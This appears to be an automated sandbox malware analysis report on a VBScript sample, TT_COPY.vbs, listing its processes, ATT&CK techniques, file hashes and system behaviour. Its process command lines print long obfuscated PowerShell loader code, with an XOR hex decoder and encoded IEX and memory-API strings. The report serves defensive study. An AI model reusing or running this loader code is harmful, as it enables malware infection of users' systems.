'81eed7c8c8c0d7c0cb8598858dfee4d5d5e1cac8c4cccbf89f9fe6d0d7d7c0cbd1e1cac8c4cccb8be2c0d1e4d6d6c0c8c7c9ccc0d68d8c85d985f2cdc0d7c088eac7cfc0c6d185de8581fa8be2c9cac7c4c9e4d6d6c0c8c7c9dce6c4c6cdc08588e4cbc18581fa8be9cac6c4d1cccacb8bf6d5c9ccd18d81e2cdc0c2ccd6cd9d8cfe8894f88be0d4d0c4c9d68d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6958c85d88c8be2c0d1f1dcd5c08d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6948c';&($ghegish7) $hoeres0;$hoeres5 = smertensbarns0 '81e6cdccc9c985988581eed7c8c8c0d7c0cb8be2c0d1e8c0d1cdcac18d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6978985fef1dcd5c0fef8f885e58d81e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d696898581e3cad7d6cecbcccbc2d6d7c0d6d0c9d1c4d1c0d7d6918c8c';&($ghegish7) $hoeres5;$hoeres1 = smertensbarns0 'd7c0d1d0d7cb8581e6cdccc9c98beccbd3cacec08d81cbd0c9c98985e58dfef6dcd6d1c0c88bf7d0cbd1ccc8c08beccbd1c0d7cad5f6c0d7d3ccc6c0d68bedc4cbc1c9c0f7c0c3f88debc0d288eac7cfc0c6d185f6dcd6d1c0c88bf7d0cbd1ccc8c08beccbd1c0d7cad5f6c0d7d3ccJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """SaFLauConFacGatUniStoUnnLi suSSemLeeAurGltIneFrnAnsFrbAnaCarIrnPrsre0St To{Ch Ir Al Ud DopCoaSerUsaPemAn(Th[FoSRetHorKoiBonSagSu]In`$NoRAfenoguniHyoOpnMesHapFrlInathnStlVaoIsvUnsel)Bo;Hu In Po Fe Fo`$DiDOceWilMuiUnnPhtBaeHerJuvSyaNalPrlGaeTorKonIfeCosDi No=Br WhNBeetrwKo-FjOKobThjRaeLecCotUn BebStyEntCieKo[cu]Hu Cr(Hy`$mrRDreOagviiMyoBanTvsKvpEklOvaacnFrlSloHovsosPi.SuLAbeNenWagSmtHuhTh No/Be Ze2Co)St;Pe Sk Gt Mi SuFUdomerOm(cr`$ArKUblVaiOvsSetUnrEmiAznTeggeeUnrGu=Al0re;Un Tr`$SpKTjlDriMesAktSurFoiUnnCagMeeSarIc He-FalBrtKa Ac`$TiRWieUdgUdiDeoRanObsSkpRelMiaPrnAnlreoAlvInsfo.BoLTreFanPrgFrtSthDd;Uu Sp`$SyKFolGoiAlsExtinrTriLinUngSkeIcrRe+Fl=Zi2he)Le{Ga Ys Un Pa Pr Te Ta Il Af`$TrDBreNolFoiSenFotCaeBrrduvPeaArlMulIneTrrFonSheHysSa[Re`$ReKOmlPaiDasTrtBurOritenVegDoeDirOp/Sw2Be]Em Gk=Lo Co[PocOnoSunTivUneMarKrtTa]Vi:tr:WiTReoRoBVgyEttWaeDe(Ma`$GrRWheFogTuiAnoNonBysDipLolDeaFonPrlUdoFovGrsUn.PaSFoucobDusBrtForCliMenTugli(Ja`$CeKMelIciAysAftMirGriCinUvgUneStrSe,Fu te2Ho)Ko,Sk Ba1Ti6Va)Fl;Ga Va Ar`$UnDSceKelPiirenFltpeeDorTevStaColFjlTrePerAcnOveDisLa[Ca`$AfKtalIdiKlsCotskrHyiUnnBrgsueAsrte/Mo2Pe]Le Zo=Mi Ne(ne`$PiDsleaulSuiFanmytFjeAnrFevTeaPrlnolKreLurFrnByeThsOb[Ek`$BaKUdltriOrsLatserOsiChnJegSkeThrSp/Er2Mu]Bi Be-prbmeximoForGr Es1Sk6St5Fr)De;Ar kn Gi An Ma}He Vn[ReSGatakrHaiSinLogOx]fi[TaSmoyCosHatPaeChmOr.unTAleAbxOvtFo.ExEkvnNocAaoMedStiHonAsgBo]No:Bi:TiADiSBeCGrILaIHu.raGCoeVitKoSVatprrUniLanSugHa(Ec`$MaDExeKvlFaiFlnBatEnePorssvFuaJalInlIneGorExnBieWhsAn)Eq;Pa}St`$RiFUpoKorsksInkMinVeiFanDugMesrerLieBrsOvuRelHotIdaUrtDieKtrDesfa0In=SiSHimUfecergotafePrnknsvibHeaHyrEknmissi0Fi Dr'MeFSv6AfDSnCfaDSu6SuDVe1InCHj0AfCUn8Da8UdBBvCMa1BaCre9VaCOr9Sa'Un;Al`$LiFodoKerHosLikConHuiTrnSpgDoslarSueEjsTeuTelVetBiaGrtReeOvransLe1Wa=OuSLumMoeUrrBrtUmeKanHyspobMuaWirInnAnsNo0Br No'UdEAn8KoCRuCUnCdo6TrDWo7cuCcuAFaDha6LyCDiAUnCNe3KrDCa1ma8FlBImFDi2DdCDyCSaCGrBSe9Am6Ch9Ok7Re8grBskFhu0ReCFiBMoDDi6NaCCo4SkCUn3HiCBr0KeETrBPoCSh4GrDRe1AnCBoCYnDSo3MiCAf0SaEUn8SaCTo0TiDCo1ScCZoDNoCFlAMeCut1KoDSe6Bo'Sq;Gr`$FiFDooStrnosKokIdnCoiblnSkgJosSprDaeTssTeuUnlSttSvaPrtHoeChrHysDi2Ny=PoSUmmPeeKnrqutCleHonidsFobFoaPrrUnnKosPo0Ra Ve'TrEPa2ImCRe0spDpr1VaFCa5TeDPa7lyCBrAHeCSi6DiEIr4VaCFr1DaCVa1UpDDu7TeCGy0hoDRe6UdDSu6De'Me;Ud`$GrFTeolerLusCukClnRaiSanHagcisCyrBeeDesVauSylFotSkaAntmueSarUdsEt3La=RaSStmEkeSkrSatHueSunTrsInbBeaHerRonFosKu0He Co'FrFRe6slDMeCFoDin6BeDOp1ToCBu0CoCUl8Gu8MeBUnFCo7OpDMo0MaCWeBJaDVi1plCJoCArCSh8BaCSt0nu8CoBMeEReCDiCFeBTaDLy1soCOm0EuDAf7ReCSuAtoDDh5brFVa6PsCIn0FeDDi7maDBa3KaCChCReCMe6FlCde0UiDHu6Re8ReBGeEseDBaCSp4KlCStBryCca1SkCfr9DaCke0EsFMi7UnCdu0PrCAs3hf'Gr;De`$PoFChoMirPesDikFlnIniBanovgSasMarKaeGrsBeuValFotFraTrtHieAlrStsKl4Da=FoSnomfjegorSvtGreBunKasLgbSparorUnnSosIn0Al Gr'JoDAd6enDSe1PeDch7DiCPrCAmCSyBFrCPi2Mu'Ra;We`$IrFBroLurSusCoktonFeiAnnNogTasMirpieLiscauTalExtKaaSptDoeunrSisIr5Do=OcSMimBaeStrRetLteSonFusUdbGraMurFonMosDr0MJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function Smertensbarns0 { param([String]$Regionsplanlovs); $Delintervallernes = New-Object byte[] ($Regionsplanlovs.Length / 2); For($Klistringer=0; $Klistringer -lt $Regionsplanlovs.Length; $Klistringer+=2){ $Delintervallernes[$Klistringer/2] = [convert]::ToByte($Regionsplanlovs.Substring($Klistringer, 2), 16); $Delintervallernes[$Klistringer/2] = ($Delintervallernes[$Klistringer/2] -bxor 165); } [String][System.Text.Encoding]::ASCII.GetString($Delintervallernes);}$Forskningsresultaters0=Smertensbarns0 'F6DCD6D1C0C88BC1C9C9';$Forskningsresultaters1=Smertensbarns0 'E8CCC6D7CAD6CAC3D18BF2CCCB96978BF0CBD6C4C3C0EBC4D1CCD3C0E8C0D1CDCAC1D6';$Forskningsresultaters2=Smertensbarns0 'E2C0D1F5D7CAC6E4C1C1D7C0D6D6';$Forskningsresultaters3=Smertensbarns0 'F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3';$Forskningsresultaters4=Smertensbarns0 'D6D1D7CCCBC2';$Forskningsresultaters5=Smertensbarns0 'E2C0D1E8CAC1D0C9C0EDC4CBC1C9C0';$Forskningsresultaters6=Smertensbarns0 'F7F1F6D5C0C6CCC4C9EBC4C8C08985EDCCC1C0E7DCF6CCC28985F5D0C7C9CCC6';$Forskningsresultaters7=Smertensbarns0 'F7D0CBD1CCC8C08985E8C4CBC4C2C0C1';$Forskningsresultaters8=Smertensbarns0 'F7C0C3C9C0C6D1C0C1E1C0C9C0C2C4D1C0';$Forskningsresultaters9=Smertensbarns0 'ECCBE8C0C8CAD7DCE8CAC1D0C9C0';$Ghegish0=Smertensbarns0 'E8DCE1C0C9C0C2C4D1C0F1DCD5C0';$Ghegish1=Smertensbarns0 'E6C9C4D6D68985F5D0C7C9CCC68985F6C0C4C9C0C18985E4CBD6CCE6C9C4D6D68985E4D0D1CAE6C9C4D6D6';$Ghegish2=Smertensbarns0 'ECCBD3CACEC0';$Ghegish3=Smertensbarns0 'F5D0C7C9CCC68985EDCCC1C0E7DCF6CCC28985EBC0D2F6C9CAD18985F3CCD7D1D0C4C9';$Ghegish4=Smertensbarns0 'F3CCD7D1D0C4C9E4C9C9CAC6';$Ghegish5=Smertensbarns0 'CBD1C1C9C9';$Ghegish6=Smertensbarns0 'EBD1F5D7CAD1C0C6D1F3CCD7D1D0C4C9E8C0C8CAD7DC';$Ghegish7=Smertensbarns0 'ECE0FD';$Ghegish8=Smertensbarns0 'F9';function fkp {Param ($Upgrown, $Depressionsperioder) ;$Hoeres0 =Smertensbarns0 '81EED7C8C8C0D7C0CB8598858DFEE4D5D5E1CAC8C4CCCBF89F9FE6D0D7D7C0CBD1E1CAC8C4CCCB8BE2C0D1E4D6D6C0C8C7C9CCC0D68D8C85D985F2CDC0D7C088EAC7CFC0C6D185DE8581FA8BE2C9CAC7C4C9E4D6D6C0C8C7C9DCE6C4C6CDC08588E4CBC18581FA8BE9CAC6C4D1CCCACB8BF6D5C9CCD18D81E2CDC0C2CCD6CD9D8CFE8894F88BE0D4D0C4C9D68D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6958C85D88C8BE2C0D1F1DCD5C08D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6948C';&($Ghegish7) $Hoeres0;$Hoeres5 = Smertensbarns0 '81E6CDCCC9C985988581EED7C8C8C0D7C0CB8BE2C0D1E8C0D1CDCAC18D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6978985FEF1DCD5C0FEF8F885E58D81E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D696898581E3CAD7D6CECBCCCBC2D6D7C0D6D0C9D1C4D1C0D7D6918C8C';&($Ghegish7) $Hoeres5;$Hoeres1 = Smertensbarns0 'D7C0D1D0D7CB8581E6CDCCC9C98BECCBD3CACEC08D81CBD0C9C98985E58DFEF6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCC6C0D68BEDC4CBC1C9C0F7C0C3F88DEBC0D288EAC7CFC0C6D185F6DCD6D1C0C88BF7D0CBD1CCC8C08BECCBD1C0D7CAD5F6C0D7D3CCJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts21
Command and Scripting Interpreter		Path Interception11
Process Injection		1
Virtualization/Sandbox Evasion		OS Credential Dumping1
Virtualization/Sandbox Evasion		Remote Services1
Archive Collected Data		Exfiltration Over Other Network Medium1
Encrypted Channel		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts421
Scripting		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts11
Process Injection		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain Accounts1
PowerShell		Logon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager1
Application Window Discovery		SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)421
Scripting		NTDS1
File and Directory Discovery		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA Secrets12
System Information Discovery		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 0000000A.00000002.763919081.0000025FB35C1000.00000004.00000800.00020000.00000000.sdmpfalse
    		high

    World Map of Contacted IPs

    No contacted IP infos

    General Information

    Joe Sandbox Version:36.0.0 Rainbow Opal
    Analysis ID:758166
    Start date and time:2022-12-01 15:29:06 +01:00
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 9m 15s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:TT_COPY.vbs
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
    Number of analysed new started processes analysed:16
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal68.evad.winVBS@6/2@0/0
    EGA Information:Failed
    HDC Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 11
    • Number of non-executed functions: 2
    Cookbook Comments:
    • Found application associated with file extension: .vbs
    • Override analysis time to 240s for JS/VBS files not yet terminated

    Warnings

    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
    • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ctldl.windowsupdate.com
    • Execution Graph export aborted for target powershell.exe, PID 5636 because it is empty
    • Not all processes where analyzed, report is missing behavior information
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtProtectVirtualMemory calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.

    Simulations

    Behavior and APIs

    No simulations

    Joe Sandbox View / Context

    IPs

    No context

    Domains

    No context

    ASNs

    No context

    JA3 Fingerprints

    No context

    Dropped Files

    No context

    Created / dropped Files

    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gby0wth2.meo.ps1

    Download File
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:very short file (no magic)
    Category:dropped
    Size (bytes):1
    Entropy (8bit):0.0
    Encrypted:false
    SSDEEP:3:U:U
    MD5:C4CA4238A0B923820DCC509A6F75849B
    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
    Malicious:false
    Reputation:high, very likely benign file
    Preview:1

    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_idul2t3g.crn.psm1

    Download File
    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    File Type:very short file (no magic)
    Category:dropped
    Size (bytes):1
    Entropy (8bit):0.0
    Encrypted:false
    SSDEEP:3:U:U
    MD5:C4CA4238A0B923820DCC509A6F75849B
    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
    Malicious:false
    Preview:1

    Static File Info

    General

    File type:ASCII text, with CRLF line terminators
    Entropy (8bit):5.882508768775152
    TrID:
      File name:TT_COPY.vbs
      File size:319816
      MD5:a27bc40b7cf1e7e7e7a9b38221d4e849
      SHA1:d24c19f3cf76f8f47fa6fffb12422f0fa0252b3b
      SHA256:28a30c25fb101ed42b050c4b82777929b1cdd9fe02f8f386bb9708d3adb3b9bf
      SHA512:b6bbcd0f8e6fa19acc91441f41f9f277a11399b15071ce06acbae4771954bba33e0acf7ee279498bfd701a3beec55c54687a25c579a54be9adcbfa2c133731f8
      SSDEEP:6144:T2J71kKaq/0xBIAbO0uzJ44bQ+YwMpXj/3CAS/Sv5Hx5QS:TBKd/0UAbO0q44jkTbvL5QS
      TLSH:CF645990AD3B55900E4BA71AFBF149CD4FF30FE3F1012F9B29B45246372A3689A19197
      File Content Preview:Smigesparcelwisecisal = ChrW(11202)......on error resume next ..Tilendebringerlateenrigg186 = FileLen("Lassoers89")......Dveskolenliveborns = Ucase(Trim(Mid("Referencerne",27,150)) ) ......BESPARINGERNESUNDERSPR = Space(35)....'LIVSFRELSERNE Concocted BYG

      File Icon

      Icon Hash:e8d69ece869a9ec4

      Network Behavior

      No network behavior found

      Statistics

      CPU Usage

      Click to jump to process

      Memory Usage

      Click to jump to process

      High Level Behavior Distribution

      Click to dive into process behavior distribution

      Behavior

      Click to jump to process

      System Behavior

      General

      Target ID:0
      Start time:15:29:59
      Start date:01/12/2022
      Path:C:\Windows\System32\wscript.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TT_COPY.vbs"
      Imagebase:0x7ff788a30000
      File size:163840 bytes
      MD5 hash:9A68ADD12EB50DDE7586782C3EB9FF9C
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      General

      Target ID:10
      Start time:15:30:39
      Start date:01/12/2022
      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Vildmnd = """SaFLauConFacGatUniStoUnnLi suSSemLeeAurGltIneFrnAnsFrbAnaCarIrnPrsre0St To{Ch Ir Al Ud DopCoaSerUsaPemAn(Th[FoSRetHorKoiBonSagSu]In`$NoRAfenoguniHyoOpnMesHapFrlInathnStlVaoIsvUnsel)Bo;Hu In Po Fe Fo`$DiDOceWilMuiUnnPhtBaeHerJuvSyaNalPrlGaeTorKonIfeCosDi No=Br WhNBeetrwKo-FjOKobThjRaeLecCotUn BebStyEntCieKo[cu]Hu Cr(Hy`$mrRDreOagviiMyoBanTvsKvpEklOvaacnFrlSloHovsosPi.SuLAbeNenWagSmtHuhTh No/Be Ze2Co)St;Pe Sk Gt Mi SuFUdomerOm(cr`$ArKUblVaiOvsSetUnrEmiAznTeggeeUnrGu=Al0re;Un Tr`$SpKTjlDriMesAktSurFoiUnnCagMeeSarIc He-FalBrtKa Ac`$TiRWieUdgUdiDeoRanObsSkpRelMiaPrnAnlreoAlvInsfo.BoLTreFanPrgFrtSthDd;Uu Sp`$SyKFolGoiAlsExtinrTriLinUngSkeIcrRe+Fl=Zi2he)Le{Ga Ys Un Pa Pr Te Ta Il Af`$TrDBreNolFoiSenFotCaeBrrduvPeaArlMulIneTrrFonSheHysSa[Re`$ReKOmlPaiDasTrtBurOritenVegDoeDirOp/Sw2Be]Em Gk=Lo Co[PocOnoSunTivUneMarKrtTa]Vi:tr:WiTReoRoBVgyEttWaeDe(Ma`$GrRWheFogTuiAnoNonBysDipLolDeaFonPrlUdoFovGrsUn.PaSFoucobDusBrtForCliMenTugli(Ja`$CeKMelIciAysAftMirGriCinUvgUneStrSe,Fu te2Ho)Ko,Sk Ba1Ti6Va)Fl;Ga Va Ar`$UnDSceKelPiirenFltpeeDorTevStaColFjlTrePerAcnOveDisLa[Ca`$AfKtalIdiKlsCotskrHyiUnnBrgsueAsrte/Mo2Pe]Le Zo=Mi Ne(ne`$PiDsleaulSuiFanmytFjeAnrFevTeaPrlnolKreLurFrnByeThsOb[Ek`$BaKUdltriOrsLatserOsiChnJegSkeThrSp/Er2Mu]Bi Be-prbmeximoForGr Es1Sk6St5Fr)De;Ar kn Gi An Ma}He Vn[ReSGatakrHaiSinLogOx]fi[TaSmoyCosHatPaeChmOr.unTAleAbxOvtFo.ExEkvnNocAaoMedStiHonAsgBo]No:Bi:TiADiSBeCGrILaIHu.raGCoeVitKoSVatprrUniLanSugHa(Ec`$MaDExeKvlFaiFlnBatEnePorssvFuaJalInlIneGorExnBieWhsAn)Eq;Pa}St`$RiFUpoKorsksInkMinVeiFanDugMesrerLieBrsOvuRelHotIdaUrtDieKtrDesfa0In=SiSHimUfecergotafePrnknsvibHeaHyrEknmissi0Fi Dr'MeFSv6AfDSnCfaDSu6SuDVe1InCHj0AfCUn8Da8UdBBvCMa1BaCre9VaCOr9Sa'Un;Al`$LiFodoKerHosLikConHuiTrnSpgDoslarSueEjsTeuTelVetBiaGrtReeOvransLe1Wa=OuSLumMoeUrrBrtUmeKanHyspobMuaWirInnAnsNo0Br No'UdEAn8KoCRuCUnCdo6TrDWo7cuCcuAFaDha6LyCDiAUnCNe3KrDCa1ma8FlBImFDi2DdCDyCSaCGrBSe9Am6Ch9Ok7Re8grBskFhu0ReCFiBMoDDi6NaCCo4SkCUn3HiCBr0KeETrBPoCSh4GrDRe1AnCBoCYnDSo3MiCAf0SaEUn8SaCTo0TiDCo1ScCZoDNoCFlAMeCut1KoDSe6Bo'Sq;Gr`$FiFDooStrnosKokIdnCoiblnSkgJosSprDaeTssTeuUnlSttSvaPrtHoeChrHysDi2Ny=PoSUmmPeeKnrqutCleHonidsFobFoaPrrUnnKosPo0Ra Ve'TrEPa2ImCRe0spDpr1VaFCa5TeDPa7lyCBrAHeCSi6DiEIr4VaCFr1DaCVa1UpDDu7TeCGy0hoDRe6UdDSu6De'Me;Ud`$GrFTeolerLusCukClnRaiSanHagcisCyrBeeDesVauSylFotSkaAntmueSarUdsEt3La=RaSStmEkeSkrSatHueSunTrsInbBeaHerRonFosKu0He Co'FrFRe6slDMeCFoDin6BeDOp1ToCBu0CoCUl8Gu8MeBUnFCo7OpDMo0MaCWeBJaDVi1plCJoCArCSh8BaCSt0nu8CoBMeEReCDiCFeBTaDLy1soCOm0EuDAf7ReCSuAtoDDh5brFVa6PsCIn0FeDDi7maDBa3KaCChCReCMe6FlCde0UiDHu6Re8ReBGeEseDBaCSp4KlCStBryCca1SkCfr9DaCke0EsFMi7UnCdu0PrCAs3hf'Gr;De`$PoFChoMirPesDikFlnIniBanovgSasMarKaeGrsBeuValFotFraTrtHieAlrStsKl4Da=FoSnomfjegorSvtGreBunKasLgbSparorUnnSosIn0Al Gr'JoDAd6enDSe1PeDch7DiCPrCAmCSyBFrCPi2Mu'Ra;We`$IrFBroLurSusCoktonFeiAnnNogTasMirpieLiscauTalExtKaaSptDoeunrSisIr5Do=OcSMimBaeStrRetLteSonFusUdbGraMurFonMosDr0Me Sp'RiEUn2NeCSt0SkDFa1MaEMa8ShCLiAFoCMa1TrDSi0FlCca9SoCGr0PhEDeDDeCBu4ClCAfBExCVa1BeCEn9UnCAn0By'Ga;Fl`$StFRdoRergasprkNonNoiNrnVagSmsFortiePrsCuuGulPitlyaDitUleLlrRusZa6bi=KlSComPuePlrRitNeeManDesAtbHvaMerPonBlsRe0Ha St'DrFUn7CoFFr1GeFPh6GlDSp5PrCTi0AdCje6EkCStCLiCTe4ExCTe9ViEVaBInCPr4UdCAm8EuCCu0Sp8fe9Sh8Pl5FaENeDFaCFrCPrCSp1WhCGa0InETr7maDSkCSuFMa6UdCKaCDuCPa2Ki8Te9Bi8Pl5NiFde5GyDRi0NoCSa7PsCMe9GaCCaCklCEn6Au'Ko;Ce`$meFAioAnrAnsOpkSmnPsiannUngPisAprTreFlsBluDelAftStaLatOveberStsBr7Sa=hySTamSteGrrFotRieOfnSesTobJuaLurSonPrsEp0St Kr'ViFVu7ChDEn0SkCKiBTrDFu1ceCHjCReCSu8TaCMo0tr8Je9Cr8Te5IrEdi8BiCDo4GeCCuBOpCMi4ReCBa2KuCId0SuCCa1Pe'gi;Fl`$StFHaoForSksFokAunUniUnnScgAfsSyrAfeDisSvuKalUntalaNatSoeAarGrsSa8Bl=BeSShmpreEerTytOreKanOvsOnbPaaKnrSknFisKi0Fo Kh'LiFSw7SuCQu0BlCOg3meCSp9DrCUd0MeCRe6CrDHa1LeCKo0VeCOv1FaEIm1SiCSk0UnCAn9BeCko0AuCln2DeCAc4boDbe1PiCSu0Da'No;Fi`$KeFLaoPerBasInkScnSpiKinDigPrsSbrIreWhsSruhilBetHaaMatKaebirZasSp9He=TeSJumVseDurSetSveKongasNebAsatwrBuninsDe0Su Be'ZyESlCBrCPlBUnESl8StCAf0KaCOu8JuCFoAMaDRe7LiDBeCudELa8OpCYdALyCEk1leDMa0PrCSn9luCAf0Gr'He;Ba`$CoGPrhSpeSpgCaiResSehMe0Re=opSSomAgeSgrCotVeeAdnCosNobDoaOmrfunPhsSi0Kl Re'MeEFo8HiDMoCSaECo1DeCSh0PrCFo9DoCun0BeCUo2PoCta4FoDXe1PrCMi0InFRo1BaDViCHaDMa5SvCSu0br'bo;Lo`$ErGTahUseTagFliTisUnhPl1In=FeSSumGrePrrRitAeeCunGrsDebOvaSkrTinHesAf0Da Mi'xmEfo6TaCUn9SyCTo4LsDde6GrDUn6No8Ko9At8Os5NoFRa5OmDAn0OrCUn7StCUn9ByCRuCLiCIs6Sk8Em9Ru8No5SiFLb6opCAl0HuCCa4PiCEn9MaCPi0JuCOv1Un8Ef9Ca8Ga5ReEDr4BaCFoBShDVa6AlCquCKvEOs6AmCUp9HeCOv4ApDSa6CaDOb6Pa8Wa9Lu8Ps5LoEVa4DyDPi0ReDDi1MiCKoAStECo6UlCMa9HjCMu4OxDIm6UnDSn6Pa'Mu;Ob`$AnGRehenespgSeiansFahFe2co=AcSGymMiemurretWoeAlnYnsSebanaSlrTrnFosst0br Re'SkEFuCMoCPrBStDTe3BgCHyAOxCMoESyCBj0Bi'Ni;Da`$SuGSnhnoeFigNaisisPahDr3St=DaSJomGleBorpitDyeVanDusBibHeaSprGrndusRu0Sp Us'SeFal5BeDEr0RuCKo7CaCOp9OpCFaCReCEt6Ko8In9Re8Ry5RiEhaDPlCArCBeCGa1haCAs0BaELu7IoDBaCBoFPa6LaCInCCaCKl2Th8Ko9Op8He5InEHoBTaCMi0AfDVi2BaFSk6ReCFo9AnCDaASpDKi1Va8Ar9Al8Bi5SlFpr3VoCSlCFaDre7CuDRe1muDTa0HeCLe4OlCVo9Wr'Be;Im`$BoGTehCheSlgKeiKvsDohSl4Dy=LoSTomNjeInrBotNoeStnSvsDibPeaPlrTinOvsPi0He Ne'PrFNo3IlCEvCKlDFo7UnDRe1HeDBe0EtCPr4inCMi9FjECo4HvCOr9OmCOn9coCAnANaCBa6Ge'Kn;So`$StGChhHaeSpgMfiBrsochDi5St=DrSSpmHaeharPstdoeArnNosPibfoaCarConBusIn0Mi at'EnCCiBDiDKa1SwCHe1SkCan9UrCCo9Fo'Fl;Ga`$IdGMihDeelagTiiUdsHyhLe6Ca=FoSfomQueMarGotGreJvnPrsHjbTnaDerDinFosAs0Sp 